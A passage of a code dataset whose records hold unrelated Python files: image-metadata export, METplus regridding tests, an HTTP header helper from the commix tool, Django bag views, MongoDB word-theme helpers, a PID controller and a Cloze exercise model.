generate_ome_fromimc(imc_acquisition):\n \"\"\"\n\n :param imc_acquisition:\n :return:\n \"\"\"\n\n y, x, c = imc_acquisition.shape\n print(x,y,c)\n metadata = MetadataTools.createOMEXMLMetadata()\n filename= '/home/vitoz/temp/test.ome.tiff'\n MetadataTools.populateMetadata(metadata, 0, filename, True, \"XYZTC\",\n FormatTools.getPixelTypeString(6), x, y, 1, c, 1, 1)\n if imc_acquisition.origin == 'mcd':\n ac_id = imc_acquisition.image_ID\n meta_xml = et.XML(imc_acquisition.original_metadata)\n ns = '{'+meta_xml.tag.split('}')[0].strip('{')+'}'\n\n channel_xml = [channel_xml for channel_xml in meta_xml.findall(ns + 'AcquisitionChannel')\n if channel_xml.find(ns + 'AcquisitionID').text == ac_id]\n\n ac_xml = [tx for tx in meta_xml.findall(ns + 'Acquisition')\n if tx.find(ns + 'ID').text == ac_id][0]\n # AcquisitionDate = ac_xml.find(ns+'StartTimeStamp').text\n # Description = ac_xml.find(ns+'Description').text\n # AblationPower = ac_xml.find(ns + 'AblationPower').text\n # AblationDistanceBetweenShots = ac_xml.find(ns + 'AblationDistanceBetweenShots').text\n # AblationFrequency = ac_xml.find(ns + 'AblationFrequency').text\n # ROIID = ac_xml.find(ns + 'ROIID').text\n # OrderNumber = ac_xml.find(ns + 'OrderNumber').text\n # SignalType = ac_xml.find(ns + 'SignalType').text\n # DataStartOffset = ac_xml.find(ns + 'DataStartOffset').text\n # DataEndOffset = ac_xml.find(ns + 'DataEndOffset').text\n # StartTimeStamp = ac_xml.find(ns + 'StartTimeStamp').text\n # EndTimeStamp = ac_xml.find(ns + 'EndTimeStamp').text\n # SegmentDataFormat = ac_xml.find(ns + 'SegmentDataFormat').text\n # ValueBytes = ac_xml.find(ns + 'ValueBytes').text\n #\n # chan_order = [int(cxml.find(ns+'OrderNumber').text) for cxml in channel_xml]\n metadata.setImageID(ac_id,0 )\n metadata.setImageName(ac_id,0)\n metadata.setPixelsDimensionOrder(DimensionOrder.XYCZT, 0)\n metadata.setPixelsSizeX(PositiveInteger(x), 0)\n metadata.setPixelsSizeY(PositiveInteger(y), 0)\n metadata.setPixelsSizeC(PositiveInteger(c), 0)\n metadata.setPixelsSizeZ(PositiveInteger(1), 0)\n metadata.setPixelsSizeT(PositiveInteger(1), 0)\n\n metadata.setPixelsPhysicalSizeX(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeY(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeZ(Length(1, units.MICROM), 0)\n\n metadata.setPixelsID(ac_id, 0)\n metadata.setPixelsType(PixelType.FLOAT, 0)\n metadata.setPixelsInterleaved(False, 0)\n\n # metadata.setTiffDataFirstC(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstZ(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstT(NonNegativeInteger(0), 0, 0)\n print(c)\n for i in range(c):\n metadata.setChannelSamplesPerPixel(PositiveInteger(1), 0, i)\n for cxml in channel_xml:\n cnr = int(cxml.find(ns+'OrderNumber').text)-3\n if cnr >=0:\n name = cxml.find(ns + 'ChannelName').text\n label = cxml.find(ns + 'ChannelLabel')\n if label.text is None:\n label = name\n else:\n print(label.text)\n label = label.text\n print(label)\n print(name)\n cid = '_'.join([label, name])\n cid = cid.strip('(').strip(')')\n name = name.replace('(','').strip(')')\n metadata.setChannelFluor(name, 0, cnr)\n metadata.setChannelName(cid, 0, cnr)\n metadata.setChannelID(cid, 0, cnr)\n # for i in range(c):\n # metadata.setPlaneTheC(NonNegativeInteger(i),0,i)\n # metadata.setPlaneTheZ(NonNegativeInteger(0), 0, i)\n # metadata.setPlaneTheT(NonNegativeInteger(0), 0, i)\n\n\n return metadata\n\n else:\n ac_id = imc_acquisition.image_ID\n metadata.setImageID(ac_id, 0)\n metadata.setImageName(ac_id, 0)\n metadata.setPixelsDimensionOrder(DimensionOrder.XYCZT, 0)\n metadata.setPixelsSizeX(PositiveInteger(x), 0)\n metadata.setPixelsSizeY(PositiveInteger(y), 0)\n metadata.setPixelsSizeC(PositiveInteger(c), 0)\n metadata.setPixelsSizeZ(PositiveInteger(1), 0)\n metadata.setPixelsSizeT(PositiveInteger(1), 0)\n\n metadata.setPixelsPhysicalSizeX(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeY(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeZ(Length(1, units.MICROM), 0)\n\n metadata.setPixelsID(ac_id, 0)\n metadata.setPixelsType(PixelType.FLOAT, 0)\n metadata.setPixelsInterleaved(False, 0)\n\n # metadata.setTiffDataFirstC(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstZ(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstT(NonNegativeInteger(0), 0, 0)\n print(c)\n for i in range(c):\n metadata.setChannelSamplesPerPixel(PositiveInteger(1), 0, i)\n for cnr, metal, label in zip(range(c), imc_acquisition.channel_metals, imc_acquisition.channel_labels):\n metadata.setChannelFluor(metal, 0, cnr)\n metadata.setChannelName(label, 0, cnr)\n metadata.setChannelID(label, 0, cnr)\n\n return metadata\n\n\ndef save_ome_tiff(filename, image, metadata):\n reader = ImageReader()\n writer = ImageWriter()\n writer.setMetadataRetrieve(metadata)\n writer.setId(filename)\n nchan = image.getNChannels()\n stack = image.getImageStack()\n print(image.getStackSize())\n for i in range(nchan):\n writer.setSeries(0)\n process = stack.getProcessor(i+1)\n pixels = process.getPixels()\n pixels = DataTools.floatsToBytes(pixels, True)\n writer.saveBytes(i, pixels)\n writer.close()\n\n\n\n\n","sub_path":"imctools/imagej/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":9472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19714615","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport re\nimport logging\nfrom collections import namedtuple\nimport pytest\nimport datetime\n\nimport produtil\n\nfrom metplus.wrappers.regrid_data_plane_wrapper import RegridDataPlaneWrapper\nfrom metplus.util import met_util as util\nfrom metplus.util import time_util\n\n# --------------------TEST CONFIGURATION and FIXTURE SUPPORT -------------\n#\n# The test configuration and fixture support the additional configuration\n# files used in METplus\n# !!!!!!!!!!!!!!!\n# !!!IMPORTANT!!!\n# !!!!!!!!!!!!!!!\n# The following two methods should be included in ALL pytest tests for METplus.\n#\n#\n#def pytest_addoption(parser):\n# parser.addoption(\"-c\", action=\"store\", help=\" -c \")\n\n\n# @pytest.fixture\n#def cmdopt(request):\n# return request.config.getoption(\"-c\")\n\n\n# -----------------FIXTURES THAT CAN BE USED BY ALL TESTS----------------\n#@pytest.fixture\ndef rdp_wrapper(metplus_config):\n \"\"\"! Returns a default RegridDataPlane with /path/to entries in the\n metplus_system.conf and metplus_runtime.conf configuration\n files. Subsequent tests can customize the final METplus configuration\n to over-ride these /path/to values.\"\"\"\n\n config = metplus_config()\n config.set('config', 'DO_NOT_RUN_EXE', True)\n return RegridDataPlaneWrapper(config)\n\n# ------------------------ TESTS GO HERE --------------------------\n\n# conf_dict is produtil config items set before creating grid_stat wrapper instance\n# out_dict is grid_stat wrapper c_dict values set by initialization\n@pytest.mark.parametrize(\n 'conf_dict, expected_field_info_list', [\n\n # 0) 1 item from var list\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\"},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'}]\n ),\n\n # 1) 1 item with level replaced from wrapper-specific\n ({'OBS_VAR1_NAME': 'P06M_NONE',\n 'OBS_VAR1_LEVELS': \"\\\"(*,*)\\\"\",\n 'OBS_REGRID_DATA_PLANE_VAR1_INPUT_LEVEL': '\"({valid?fmt=%Y%m%d_%H%M%S},*,*)\"'},\n [{'index': '1', 'obs_name': 'P06M_NONE', 'obs_level': '\"(20180201_000000,*,*)\"'},\n ]\n ),\n\n # 2) 2 items from var list\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n ]\n ),\n\n # 3) 2 items from var list, 3rd from wrapper-specific\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3'},\n ]\n ),\n\n # 4) 3 items from var list, 1 replaced and 4th from wrapper-specific\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_VAR3_NAME': 'ACPCP',\n 'OBS_VAR3_LEVELS': \"A02\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_FIELD_NAME': 'NAME_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_LEVEL': 'LEVEL_FOR_4'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3', 'obs_level': 'A02'},\n {'index': '4', 'obs_name': 'NAME_FOR_4', 'obs_level': 'LEVEL_FOR_4'},\n ]\n ),\n\n # 5) 1 item from var list add output name\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_REGRID_DATA_PLANE_VAR1_OUTPUT_FIELD_NAME': 'OUT_NAME',},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06', 'obs_output_name': 'OUT_NAME'}]\n ),\n\n # 6) 3 items from var list, 1 replaced and 4th from wrapper-specific, add output name\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_VAR3_NAME': 'ACPCP',\n 'OBS_VAR3_LEVELS': \"A02\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_FIELD_NAME': 'NAME_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_LEVEL': 'LEVEL_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_OUTPUT_FIELD_NAME': 'OUT_NAME_4'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3', 'obs_level': 'A02'},\n {'index': '4', 'obs_name': 'NAME_FOR_4', 'obs_level': 'LEVEL_FOR_4', 'obs_output_name': 'OUT_NAME_4'},\n ]\n ),\n ]\n)\n\ndef test_get_field_info_list(metplus_config, conf_dict, expected_field_info_list):\n config = metplus_config()\n\n data_type = 'OBS'\n\n for key, value in conf_dict.items():\n config.set('config', key, value)\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\", '%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = util.parse_var_list(config, time_info, data_type=data_type)\n\n rdp = RegridDataPlaneWrapper(config)\n\n field_info_list = rdp.get_field_info_list(var_list, data_type, time_info)\n print(f\"FIELD INFO LIST: {field_info_list}\")\n print(f\"EXPECTED FIELD INFO LIST: {expected_field_info_list}\")\n is_good = True\n if len(field_info_list) != len(expected_field_info_list):\n assert(False)\n\n for actual_field, expected_field in zip(field_info_list, expected_field_info_list):\n for key, value in expected_field.items():\n if actual_field[key] != value:\n print(f\"{actual_field[key]} not equal to {value}\")\n is_good = False\n\n# field info is the input dictionary with name and level info to parse\n# expected_arg is the argument that should be set by the function\n# note: did not include OBS because they are handled the same way as FCST\n@pytest.mark.parametrize(\n 'field_info, expected_arg', [\n\n # 0) name/level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"\\\"(1,*,*)\\\"\"},\n \"-field 'name=\\\"F_NAME\\\"; level=\\\"(1,*,*)\\\";'\"\n ),\n\n # 1) python embedding script\n ({'fcst_name': 'my_script.py some args',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"my_script.py some args\\\";'\"\n ),\n\n # 2) name/level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"A06\"},\n \"-field 'name=\\\"F_NAME\\\"; level=\\\"A06\\\";'\"\n ),\n\n # 3) name, no level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"F_NAME\\\";'\"\n ),\n\n # 4) python embedding script\n ({'fcst_name': 'my_script.py some args',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"my_script.py some args\\\";'\"\n ),\n ]\n)\n\ndef test_set_field_command_line_arguments(metplus_config, field_info, expected_arg):\n data_type = 'FCST'\n\n config = metplus_config()\n\n rdp = RegridDataPlaneWrapper(config)\n\n rdp.set_field_command_line_arguments(field_info, data_type)\n assert(rdp.args[0] == expected_arg)\n\n@pytest.mark.parametrize(\n 'field_info, input_name, expected_name', [\n\n # 0) use fcst name\n ({'fcst_output_name': 'F_NAME'},\n \"INPUT_NAME\",\n 'F_NAME',\n ),\n\n # 1) empty fcst name, use input name\n ({'fcst_output_name': ''},\n \"INPUT_NAME\",\n 'INPUT_NAME',\n ),\n\n # 2) no fcst name, use input name\n ({'fcst_name': 'F_NAME'},\n \"INPUT_NAME\",\n 'INPUT_NAME',\n ),\n ]\n)\ndef test_get_output_name(metplus_config, field_info, input_name, expected_name):\n data_type = 'FCST'\n\n config = metplus_config()\n rdp = RegridDataPlaneWrapper(config)\n\n assert(rdp.get_output_name(field_info, data_type, input_name) == expected_name)\n\ndef test_run_rdp_once_per_field(metplus_config):\n data_type = 'FCST'\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\",'%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = [{'index': '1', 'fcst_name': 'FNAME1', 'fcst_level': 'A06'},\n {'index': '2', 'fcst_name': 'FNAME2', 'fcst_level': 'A03', 'fcst_output_name': 'OUTNAME2'},\n ]\n\n wrap = rdp_wrapper(metplus_config)\n wrap.c_dict['ONCE_PER_FIELD'] = True\n wrap.c_dict['FCST_OUTPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_accum{level?fmt=%2H}.nc'\n\n wrap.c_dict['FCST_INPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_ZENITH'\n wrap.c_dict['METHOD'] = 'BUDGET'\n wrap.c_dict['WIDTH'] = 2\n wrap.c_dict['VERIFICATION_GRID'] = 'VERIF_GRID'\n wrap.c_dict['FCST_OUTPUT_DIR'] = os.path.join(wrap.config.getdir('OUTPUT_BASE'),\n 'RDP_test')\n\n wrap.run_at_time_once(time_info, var_list, data_type)\n\n expected_cmds = [f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME1\\\"; \"\n \"level=\\\"A06\\\";' -name FNAME1 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_accum06.nc\",\n f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME2\\\"; \"\n \"level=\\\"A03\\\";' -name OUTNAME2 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_accum03.nc\",\n ]\n\n test_passed = True\n\n if len(wrap.all_commands) != len(expected_cmds):\n print(\"Number of commands run is not the same as expected\")\n print(f\"Actual commands: {wrap.all_commands}\\n\")\n print(f\"Expected commands: {expected_cmds}\\n\")\n assert(False)\n\n for (cmd, _), expected_cmd in zip(wrap.all_commands, expected_cmds):\n print(f\" ACTUAL:{cmd}\")\n print(f\"EXPECTED:{expected_cmd}\")\n if cmd != expected_cmd:\n test_passed = False\n\n assert(test_passed)\n\ndef test_run_rdp_all_fields(metplus_config):\n data_type = 'FCST'\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\",'%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = [{'index': '1', 'fcst_name': 'FNAME1', 'fcst_level': 'A06'},\n {'index': '2', 'fcst_name': 'FNAME2', 'fcst_level': 'A03', 'fcst_output_name': 'OUTNAME2'},\n ]\n\n wrap = rdp_wrapper(metplus_config)\n wrap.c_dict['ONCE_PER_FIELD'] = False\n wrap.c_dict['FCST_OUTPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_ALL.nc'\n\n wrap.c_dict['FCST_INPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_ZENITH'\n wrap.c_dict['METHOD'] = 'BUDGET'\n wrap.c_dict['WIDTH'] = 2\n wrap.c_dict['VERIFICATION_GRID'] = 'VERIF_GRID'\n wrap.c_dict['FCST_OUTPUT_DIR'] = os.path.join(wrap.config.getdir('OUTPUT_BASE'),\n 'RDP_test')\n\n wrap.run_at_time_once(time_info, var_list, data_type)\n\n expected_cmds = [f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME1\\\"; \"\n \"level=\\\"A06\\\";' -field 'name=\\\"FNAME2\\\"; level=\\\"A03\\\";' \"\n \"-name FNAME1,OUTNAME2 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_ALL.nc\",\n ]\n\n test_passed = True\n\n if len(wrap.all_commands) != len(expected_cmds):\n print(\"Number of commands run is not the same as expected\")\n assert(False)\n\n for (cmd, _), expected_cmd in zip(wrap.all_commands, expected_cmds):\n print(f\" ACTUAL:{cmd}\")\n print(f\"EXPECTED:{expected_cmd}\")\n if cmd != expected_cmd:\n test_passed = False\n\n assert(test_passed)\n\ndef test_set_command_line_arguments(metplus_config):\n test_passed = True\n wrap = rdp_wrapper(metplus_config)\n\n expected_args = ['-width 1',]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 0 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.c_dict['GAUSSIAN_DX'] = 2\n\n expected_args = ['-width 1',\n '-gaussian_dx 2',\n ]\n\n wrap.args.clear()\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 1 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['METHOD'] = 'BUDGET'\n\n expected_args = ['-method BUDGET',\n '-width 1',\n '-gaussian_dx 2',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 2 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['GAUSSIAN_RADIUS'] = 3\n\n expected_args = ['-method BUDGET',\n '-width 1',\n '-gaussian_dx 2',\n '-gaussian_radius 3',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 3 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['WIDTH'] = 4\n\n expected_args = ['-method BUDGET',\n '-width 4',\n '-gaussian_dx 2',\n '-gaussian_radius 3',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 4 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n assert(test_passed)\n","sub_path":"internal_tests/pytests/regrid_data_plane/test_regrid_data_plane.py","file_name":"test_regrid_data_plane.py","file_ext":"py","file_size_in_byte":14207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607066046","text":"#!/usr/bin/env python\n# encoding: UTF-8\n\n\"\"\"\n This file is part of commix (@commixproject) tool.\n Copyright (c) 2015 Anastasios Stasinopoulos (@ancst).\n https://github.com/stasinopoulos/commix\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n \n For more see the file 'readme/COPYING' for copying permission.\n\"\"\"\n\nimport re\nimport base64\n\nfrom src.utils import menu\n\n\"\"\"\n Check for added headers.\n\"\"\"\n\ndef do_check(request):\n \n # Check if defined any HTTP Host header.\n if menu.options.host:\n Host = menu.options.host\n request.add_header('Host', Host)\n \n # Check if defined any HTTP Referer header.\n if menu.options.referer:\n Referer = menu.options.agent\n request.add_header('Referer', Referer)\n \n # Check if defined any HTTP User-Agent header.\n if menu.options.agent:\n Agent = menu.options.agent\n request.add_header('User-Agent', Agent)\n \n # Check if defined any HTTP Cookie header.\n if menu.options.cookie:\n Cookie = menu.options.cookie\n request.add_header('Cookie', Cookie)\n\n # Check if defined any HTTP Basic Authentication credentials.\n if menu.options.auth_cred:\n b64_string = base64.encodestring(menu.options.auth_cred).replace('\\n', '')\n request.add_header(\"Authorization\", \"Basic \" + b64_string +\"\")\n \n # Check if defined any extra HTTP headers.\n if menu.options.headers:\n extra_headers = menu.options.headers\n extra_headers = extra_headers.split(\":\")\n extra_headers = ':'.join(extra_headers)\n extra_headers = extra_headers.split(\"\\\\n\")\n # Remove empty strings\n extra_headers = [x for x in extra_headers if x]\n for extra_header in extra_headers:\n # Extra HTTP Header name \n http_header_name = re.findall(r\"(.*):\", extra_header)\n http_header_name = ''.join(http_header_name)\n # Extra HTTP Header value\n http_header_value = re.findall(r\":(.*)\", extra_header)\n http_header_value = ''.join(http_header_value)\n request.add_header(http_header_name, http_header_value)\n\n#eof","sub_path":"src/core/requests/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272774742","text":"from django.shortcuts import render, redirect, HttpResponse\n\n# Create your views here.\n\ndef view_bag(request):\n ''' a view that renders the bag content'''\n return render(request, 'bag/bag.html')\n\n\ndef add_to_bag(request, item_name):\n \"\"\" Add a product/service to bag \"\"\"\n\n redirect_url = request.POST.get('redirect_url')\n bag = request.session.get('bag', {})\n\n if item_name in list(bag.keys()):\n bag[item_name]\n else:\n bag[item_name] = item_name\n\n request.session['bag'] = bag\n return render(request, 'bag/bag.html')\n\n\ndef remove_from_bag(request, item_name):\n \"\"\" remove the item from bag\"\"\"\n\n bag = request.session.get('bag', {})\n if item_name in list(bag.keys()):\n print(bag)\n bag.pop(item_name)\n print(bag)\n\n request.session['bag'] = bag\n return HttpResponse(status=200)","sub_path":"bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"389832244","text":"from db_operations.connection import dictionary\n\n# Variables\nwords_on_game = []\nwords_already_played = []\n\ndef create_theme(name: str, words: list) -> int:\n \"\"\"\n Esta es la función encargada de crear un nuevo tema en el juego.\n :param name: Nombre del tema.\n :param words: Palabras incluídas en el tema.\n :return: 1. Creado correctamente, 2. Problema de inserción, 3. Nombre inválido, 4.Tema ya creado\n \"\"\"\n valid_theme = True\n valid_theme &= True if \"\".join(name.strip().split()).isalpha() and len(name) > 1 else False\n\n theme_names = list(dictionary.find({'name': name.strip().title()}))\n\n valid_theme &= True if len(theme_names) == 0 else False\n\n # Verificamos las palabras ingresadas\n valid_words = []\n\n for word in words:\n valid = True\n valid &= True if word.strip().isalpha() else False\n valid &= True if len(word) > 1 else False\n\n if valid:\n ready_word = word.strip().title()\n valid_words.append(ready_word)\n\n if len(theme_names) == 0:\n if valid_theme:\n theme = {\n 'name': name.strip().title(),\n 'words': valid_words,\n 'times_used': 0\n }\n\n try:\n dictionary.insert_one(theme)\n return 1\n except:\n return 2\n else:\n return 3\n else:\n return 4\n\n\ndef get_themes() -> list:\n \"\"\"\n Esta función trae todos los temas de la base de datos.\n :return: Una lista con los nombres de cada tema.\n \"\"\"\n themes = ['Agregar tema', 'Todos los temas']\n all_themes = list(dictionary.find())\n\n for theme in all_themes:\n themes.append(theme['name'])\n\n return themes\n\n\ndef setup_words(themes: list) -> None:\n \"\"\"\n Esta función se encarga de crear un arreglo de forma local con todas las palabras\n traídas de la base de datos correspondientes a los temas activos del juego actual.\n :param themes: Una lista con los nombres de los temas en juego.\n :return: Nada\n \"\"\"\n if \"Todos los temas\" in themes:\n all_themes = list(dictionary.find())\n for theme in all_themes:\n for word in theme['words']:\n words_on_game.append(word)\n else:\n db_themes = list(dictionary.find())\n for theme in db_themes:\n if theme['name'] in themes:\n for word in theme['words']:\n words_on_game.append(word)\n\n\ndef check_word(word: str) -> int:\n \"\"\"\n Verifica si la palabra recibida está dentro de las palabras jugadas.\n :param word: Palabra ingresada por el usuario.\n :return: 1. Palabra ya jugada, 2. Palabra no jugada.\n \"\"\"\n if word.title() in words_on_game:\n return 1\n else:\n return 2\n\n\ndef is_word_played(word: str) -> int:\n \"\"\"\n Esta función recibe una palabra y verifica si dicha palabra ya fue usada en el juego.\n :param word: Palabra ingresada por el jugador\n :return: 1. Palabra no usada, 2. Palabra usada.\n \"\"\"\n if word.title() in words_already_played:\n return 2\n else:\n return 1\n\n\ndef add_word_db(word: str, theme: str) -> int:\n \"\"\"\n Esta función añade la palabra a la base de datos del tema ingresado.\n :param word: Palabra ingresada por el usuario.\n :param theme: Tema elegido por el usuario.\n :return: 1. Inserción exitosa, 2. Inserción fallida.\n \"\"\"\n\n\n db_theme = list(dictionary.find({'name': theme}))[0]\n previous_length = len(db_theme['words'])\n\n word = word.title()\n dictionary.update(\n {'name': theme},\n {'$push': {'words': word}}\n )\n\n db_theme = list(dictionary.find({'name': theme}))[0]\n after_length = len(db_theme['words'])\n\n if after_length == (previous_length + 1):\n return 1\n return 2\n\n\ndef get_words(theme: str) -> list:\n \"\"\"\n Esta función buscará en la base de datos el tema que recibe por parámetro\n y devuelve una lista con las palabras encontradas.\n :param theme: Nombre del tema a buscar.\n :return: Lista con las palabras encontradas.\n \"\"\"\n my_theme = list(dictionary.find({'name': theme}))[0]\n\n return my_theme['words']\n\n\ndef update_word_db(prev_word: str, after_word: str, theme:str) -> int:\n \"\"\"\n Esta función se encargará de modificar la palabra dada en la base de datos.\n :param prev_word: Palabra seleccionada de la base de datos por el usuario.\n :param after_word: Palabra editada y válida que se ingresará a la base de datos reemplazando el valor de prev_word.\n :param theme: Tema que contiene la palabra que se va a editar.\n :return: 1. Transacción exitosa, 2. Transacción fallida.\n \"\"\"\n\n\n try:\n dictionary.update(\n {'name': theme, 'words': prev_word},\n {'$set': {'words.$': after_word}}\n )\n return 1\n except:\n return 2\n\n\ndef delete_word_db(word: str, theme: str) -> int:\n \"\"\"\n Esta función se encarga de eliminar una palabra de la base de datos.\n :param word: Palabra a eliminar.\n :param theme: Tema del que será eliminada la palabra.\n :return: 1. Transacción exitosa, 2. Transacción fallida.\n \"\"\"\n\n try:\n dictionary.update(\n {'name': theme},\n {'$pull': {'words': word}}\n )\n return 1\n except:\n return 2\n\n\n\n\n\n\n\n\n\n","sub_path":"db_operations/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136472005","text":"import time\n\nclass PIDController:\n def __init__(self, k_P, k_I, k_D, target_value = 0):\n self.k_P = k_P\n self.k_I = k_I\n self.k_D = k_D\n self.e_P = 0\n self.e_I = 0\n self.e_D = 0\n self.target_value = target_value\n self.adjusted_value = target_value\n self.last_time = None\n def send_value(self, value):\n # Check for first run\n if self.last_time == None:\n self.last_time = time.time()\n self.e_P = value - self.target_value\n return\n # Update the time difference\n new_time = time.time()\n dt = new_time - self.last_time\n self.last_time = new_time\n # Update the errors\n new_error = value - self.target_value\n self.e_D = (new_error - self.e_P) / dt\n self.e_I += new_error * dt\n self.e_P = new_error\n # Update the adjusted value\n self.adjusted_value = self.target_value - (self.k_P * self.e_P + self.k_I * self.e_I + self.k_D * self.e_D)\n","sub_path":"gnc/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13024452","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom exeapp.models.idevices.idevice import Idevice\nfrom exeapp.models.idevices.genericidevice import GenericIdevice\nfrom exeapp.models.idevices import fields\n\nclass ClozeIdevice(GenericIdevice):\n\n group = Idevice.TEST\n name = _(\"Cloze\")\n title = models.CharField(max_length=100, default=name)\n author = _(\"University of Auckland\")\n purpose = _(\"\"\"

    Cloze exercises are texts or\n sentences where students must fill in\n missing words. They are often used for the\n following purposes:

    \n
      \n
    1. To check knowledge of core course\n concepts (this could be a pre-check,\n formative exercise, or summative check).
    2. \n
    3. To check reading comprehension.
    4. \n
